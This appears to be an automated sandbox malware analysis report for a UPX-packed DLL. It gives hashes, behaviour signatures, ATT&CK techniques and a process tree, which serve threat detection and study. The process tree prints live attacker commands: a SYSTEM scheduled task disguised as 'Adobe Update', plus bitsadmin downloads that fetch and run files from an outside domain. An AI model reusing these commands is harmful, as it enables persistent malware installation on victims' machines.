5c1938b66e479ef53c8601eec28b0cf905374c922fa7a05a1d76203b9921b992

Analysis

max time kernel
229s
max time network
331s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
23-11-2022 20:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5c1938b66e479ef53c8601eec28b0cf905374c922fa7a05a1d76203b9921b992.dll
Size

113KB
MD5

1cd48ca07e03ca4dd9b2a7075048c238
SHA1

44d70f9fd7431b0d8c6b2abced3ecec6e04d5c83
SHA256

5c1938b66e479ef53c8601eec28b0cf905374c922fa7a05a1d76203b9921b992
SHA512

9707108a0de75f58e31600e423a4e6a86f6d8e79a252acd9eee0de0575eaa3e49f269d4d51de8d7cfa09e3448dfe49d6d0ac2f997b60e3f3fc7065c60bd39a4e
SSDEEP

1536:T8b0zyJO5R1fGyPk8zS6lglv9xs+YuVfJfQViw1jkt5PY3P6d5sXmbHDK9hqdj6U:T8Ns5HuaKlAihQ5jcxgP6b9bjK2gNz

Score

8^/10

upx

Malware Config

Signatures

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1520-56-0x00000000001B0000-0x0000000000203000-memory.dmp	upx
behavioral1/memory/1520-57-0x00000000001B0000-0x0000000000203000-memory.dmp	upx

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1768	1520	WerFault.exe	28

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1028	schtasks.exe

Download via BitsAdmin 1 TTPs 4 IoCs

dropper

BITS Jobs

T1197

pid	Process
1716	bitsadmin.exe
1660	bitsadmin.exe
752	bitsadmin.exe
1904	bitsadmin.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 288 wrote to memory of 1520	288	rundll32.exe	28
PID 288 wrote to memory of 1520	288	rundll32.exe	28
PID 288 wrote to memory of 1520	288	rundll32.exe	28
PID 288 wrote to memory of 1520	288	rundll32.exe	28
PID 288 wrote to memory of 1520	288	rundll32.exe	28
PID 288 wrote to memory of 1520	288	rundll32.exe	28
PID 288 wrote to memory of 1520	288	rundll32.exe	28
PID 1520 wrote to memory of 1732	1520	rundll32.exe	29
PID 1520 wrote to memory of 1732	1520	rundll32.exe	29
PID 1520 wrote to memory of 1732	1520	rundll32.exe	29
PID 1520 wrote to memory of 1732	1520	rundll32.exe	29
PID 1732 wrote to memory of 1028	1732	cmd.exe	32
PID 1732 wrote to memory of 1028	1732	cmd.exe	32
PID 1732 wrote to memory of 1028	1732	cmd.exe	32
PID 1732 wrote to memory of 1028	1732	cmd.exe	32
PID 1520 wrote to memory of 1132	1520	rundll32.exe	31
PID 1520 wrote to memory of 1132	1520	rundll32.exe	31
PID 1520 wrote to memory of 1132	1520	rundll32.exe	31
PID 1520 wrote to memory of 1132	1520	rundll32.exe	31
PID 1520 wrote to memory of 1688	1520	rundll32.exe	35
PID 1520 wrote to memory of 1688	1520	rundll32.exe	35
PID 1520 wrote to memory of 1688	1520	rundll32.exe	35
PID 1520 wrote to memory of 1688	1520	rundll32.exe	35
PID 1132 wrote to memory of 1716	1132	cmd.exe	34
PID 1132 wrote to memory of 1716	1132	cmd.exe	34
PID 1132 wrote to memory of 1716	1132	cmd.exe	34
PID 1132 wrote to memory of 1716	1132	cmd.exe	34
PID 1520 wrote to memory of 1572	1520	rundll32.exe	37
PID 1520 wrote to memory of 1572	1520	rundll32.exe	37
PID 1520 wrote to memory of 1572	1520	rundll32.exe	37
PID 1520 wrote to memory of 1572	1520	rundll32.exe	37
PID 1520 wrote to memory of 544	1520	rundll32.exe	40
PID 1520 wrote to memory of 544	1520	rundll32.exe	40
PID 1520 wrote to memory of 544	1520	rundll32.exe	40
PID 1520 wrote to memory of 544	1520	rundll32.exe	40
PID 1688 wrote to memory of 1660	1688	cmd.exe	39
PID 1688 wrote to memory of 1660	1688	cmd.exe	39
PID 1688 wrote to memory of 1660	1688	cmd.exe	39
PID 1688 wrote to memory of 1660	1688	cmd.exe	39
PID 1520 wrote to memory of 1768	1520	rundll32.exe	42
PID 1520 wrote to memory of 1768	1520	rundll32.exe	42
PID 1520 wrote to memory of 1768	1520	rundll32.exe	42
PID 1520 wrote to memory of 1768	1520	rundll32.exe	42
PID 1572 wrote to memory of 752	1572	cmd.exe	43
PID 1572 wrote to memory of 752	1572	cmd.exe	43
PID 1572 wrote to memory of 752	1572	cmd.exe	43
PID 1572 wrote to memory of 752	1572	cmd.exe	43
PID 544 wrote to memory of 1904	544	cmd.exe	44
PID 544 wrote to memory of 1904	544	cmd.exe	44
PID 544 wrote to memory of 1904	544	cmd.exe	44
PID 544 wrote to memory of 1904	544	cmd.exe	44

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\5c1938b66e479ef53c8601eec28b0cf905374c922fa7a05a1d76203b9921b992.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:288
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\5c1938b66e479ef53c8601eec28b0cf905374c922fa7a05a1d76203b9921b992.dll,#1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1520
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /CREATE /SC onstart /DELAY 0015:00 /TN "Adobe Update" /TR "cmd /c bitsadmin /transfer My /Download /PRIORITY HIGH http://jimmy.myungyoung.com/c001.jpg %TEMP%\c001.cpl &%TEMP%\c001.cpl" /ru SYSTEM /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1732
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /SC onstart /DELAY 0015:00 /TN "Adobe Update" /TR "cmd /c bitsadmin /transfer My /Download /PRIORITY HIGH http://jimmy.myungyoung.com/c001.jpg C:\Users\Admin\AppData\Local\Temp\c001.cpl &C:\Users\Admin\AppData\Local\Temp\c001.cpl" /ru SYSTEM /f
      4⤵
      Creates scheduled task(s)
      PID:1028
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://macaco.myungyoung.com/c001/Anonymizer.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Anonymizer.dll"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1132
  - - C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer myDownload /Download /Priority HIGH "http://macaco.myungyoung.com/c001/Anonymizer.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Anonymizer.dll"
      4⤵
      Download via BitsAdmin
      PID:1716
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://macaco.myungyoung.com/c001/manifest.json.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\manifest.json"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1688
  - - C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer myDownload /Download /Priority HIGH "http://macaco.myungyoung.com/c001/manifest.json.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\manifest.json"
      4⤵
      Download via BitsAdmin
      PID:1660
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://macaco.myungyoung.com/c001/Migre.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Migre.dll"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1572
  - - C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer myDownload /Download /Priority HIGH "http://macaco.myungyoung.com/c001/Migre.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Migre.dll"
      4⤵
      Download via BitsAdmin
      PID:752
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://macaco.myungyoung.com/c001/icon.png" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\icon.png"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:544
  - - C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer myDownload /Download /Priority HIGH "http://macaco.myungyoung.com/c001/icon.png" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\icon.png"
      4⤵
      Download via BitsAdmin
      PID:1904
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 332
    3⤵
    - Program crash
    PID:1768

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

BITS Jobs

T1197

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

BITS Jobs

T1197

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/544-65-0x0000000000000000-mapping.dmp

Download
memory/752-69-0x0000000000000000-mapping.dmp

Download
memory/1028-59-0x0000000000000000-mapping.dmp

Download
memory/1132-60-0x0000000000000000-mapping.dmp

Download
memory/1520-57-0x00000000001B0000-0x0000000000203000-memory.dmp

Filesize
332KB

Download
memory/1520-54-0x0000000000000000-mapping.dmp

Download
memory/1520-56-0x00000000001B0000-0x0000000000203000-memory.dmp

Filesize
332KB

Download
memory/1520-55-0x0000000074DA1000-0x0000000074DA3000-memory.dmp

Filesize
8KB

Download
memory/1572-64-0x0000000000000000-mapping.dmp

Download
memory/1660-66-0x0000000000000000-mapping.dmp

Download
memory/1688-61-0x0000000000000000-mapping.dmp

Download
memory/1716-62-0x0000000000000000-mapping.dmp

Download
memory/1732-58-0x0000000000000000-mapping.dmp

Download
memory/1768-68-0x0000000000000000-mapping.dmp

Download
memory/1904-71-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads